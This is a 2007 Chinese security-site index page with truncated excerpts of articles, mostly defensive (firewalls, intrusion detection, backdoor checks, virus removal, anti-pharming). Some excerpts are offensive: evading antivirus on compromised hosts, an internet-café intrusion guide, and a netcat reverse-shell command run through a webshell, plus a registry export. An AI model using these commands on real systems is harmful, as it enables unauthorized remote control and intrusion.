-
[2007-08-15] 利用cmd躲过肉鸡病毒防火墙的方法
因为我在学校上的是教育网。要扫国外的主机需要靠跳板。
但很多软件都已经被列为病毒!
比如:opentelnet,ca等,放到肉鸡上很可能就被杀掉....不爽
连SkSockServer都被列为病毒...郁闷啊!!
经过几次尝试,我想...
-
[2007-08-15] 黑客入门:如何选择漏洞扫描工具
对于一个复杂的多层结构的系统和网络安全规划来说,隐患扫描是一项重要的组成元素。隐患扫描能够模拟黑客的行为,对系统设置进行攻击测试,以帮助管理员在黑客攻击之前,找出网络中存在的漏洞。这样的工具可...
-
[2007-08-15] 你知道多少?防火墙安装终极攻略
让PC直接暴露在Internet上,就好比离家时不锁房门,最后的结果是有人有意或无意地闯入您的房间,将金银珠宝一扫而光。怎样才能保障系统的安全呢?安装防火墙软件算是最常采用的措施了吧,而通常作为补充手段,安...
-
[2007-08-15] 用Jmail写文件进硬盘
其实只算个模板,具体如果可以写这个ASP进主机的话,就背离了写这个程序的意义了.
Jmail是现在非常流行的一个Mail组件,可以以简单的代码实现SMTP\POP3的功能.DVBBS\BBSXP等WEB脚本程序都有使用Jmail的选项功能.
如...
-
[2007-08-15] 江民公布手工、自动清除Zotob病毒全攻略
2005年8月15日,江民反病毒中心截获一个利用微软“即插即用服务代码执行漏洞”(MS05-039)的蠕虫病毒I-Worm/Zobot。该病毒利用最新漏洞传播,并且可以通过IRC接受黑客命令,使被感染计算机被黑客完全控制。截...
-
[2007-08-15] 打造IIS网站的专用“护心甲”—实战SSL加密
Windows网络操作系统内置的IIS是大家最常用的Web服务器。但在系统默认配置下,IIS使用的是“HTTP协议”以明文形式传输数据,没有采用任何加密手段,传输的重要数据很容易被窃取。这对于一些安全性要求高的网...
-
[2007-08-15] 如何正确使用Windows的Ping命令
对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家...
-
[2007-08-15] 介绍入侵检测概念、过程分析和布署
1、 侵检测的基本概念
入侵检测是指"通过对行为、安全日志或审计数据或其它网络上可以获得的信息进行操作,检测到对系统的闯入或闯入的企图"(参见国标GB/T18336)。入侵检测是检测和响应计算机误用的学...
-
[2007-08-15] Linux下初步后门查找
1. 帐号后门
检查/etc/passwd、/etc/shadow文件中如下帐号是否已经拥有合法登录shell、登录口令
bin、daemon、adm、lp、sync、shutdown、halt、mail、news、uucp、games、
gopher、ftp、nobody、xfs、named、gdm...
-
[2007-08-15] apache2.0.54防止盗连接详细配置
要让apache防盗连接,首先要让apache支持.htaccess客户设置文件,还要增加mod_rewrite模块。以下是我的编译安装过程。
1. 安装apache增加mod_rewrite模块
tar xfzv httpd-2.0.54.tar.gz
cd httpd-2.0.54
./confi...
-
[2007-08-15] 两招实用远程控制技巧
在网络规模日益扩大的今天,如果还沿用以前对单机分别管理的模式,肯定是不现实的!为了有效提高网络的管理和维护效率,不少网络管理人员都选用了远程控制模式,来对局域网或服务器进行随时随地的管理!不过当你选...
-
[2007-08-15] 无线局域网(WLAN)安全管理指南
对某些人来说,他们可能认为无线网络的安全性问题显得很复杂,设置一个安全的无线网络可能需要十分专业的基础知识和进行复杂的设置,也有人会讲:“我只是用电脑上上网而已,并没有干其他什么重要的事情,为什...
-
[2007-08-15] 暑假为孩子请个“网络妈妈”
一年一度的学生暑期长假又到了,在漫长的近两个月的假期里,家长没有时间来照顾、管理孩子,他们一般都会在家里上网、玩游戏,为了让他们有节制的合理使用电脑,家长们是对此事是想尽办法,绞尽脑汁,可一直...
-
[2007-08-15] 企业网管员之对抗BT下载7种武器
为了不影响正常业务的进行,企业网络的管理员需要想尽办法封闭BT有可能经过的所有端口,将一些特定的种子发布站点阻挡在外,将企业内的BT尝试整体封杀。
编者按:
BT下载正给越来越多的企业办公带来危...
-
[2007-08-15] 增强活动目录安全性的五个步骤
让AD更安全!是的,每个管理员都希望如此,但是要尽可能高地实现这个目标,您还是需要花上一点力气的,本文通过5个步骤,帮您理解如何来切实增强AD基础设施的安全。
活动目录(AD)中保存着能够对AD进行访问...
-
[2007-08-15] 怎样防止域欺骗—阻止域名劫持
谈到网络安全,你可能熟悉网页欺诈的危险,但是知道域欺骗(pharming)威胁吗?对于一家在线公司来说,这种风险是致命的!
简单来说,域欺骗就是把原本准备访问某网站的用户,在不知不觉中,劫持到仿冒的网站...
-
[2007-08-15] 解除TCP/IP限制的小技巧
1.用NC反弹得到一个shell
本机监听 NC -l -p 32
WEBSHELL运行:
x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"
得到一个shell
2.CMD下导出注册表文件
C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MAC...
-
[2007-08-15] 攻无不克决战网吧入侵
一. 网吧入侵
入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆!
这样我们开机进入系统的时候登...
-
[2007-08-15] Internet中的主要安全隐患
Internet的安全隐患主要体现在下列几方面:
1. Internet是一个开放的、无控制机构的网络,黑客(Hacker)经常会侵入网络中的计算机系统,或窃取机密数据和盗用特权,或破坏重要数据,或使系统功能得不到充分...
-
[2007-08-15] 不再被欺:网络电话陷阱的防范
设置“网络电话陷阱”的网站,通常采用在用户上网浏览信息过程中,提供一些诱人的内容,或是不健康的图片及电影,当用户尝试打开这些“诱人”的图片进一步浏览时,网页会指示他们下载某一软件用以观看,并配...
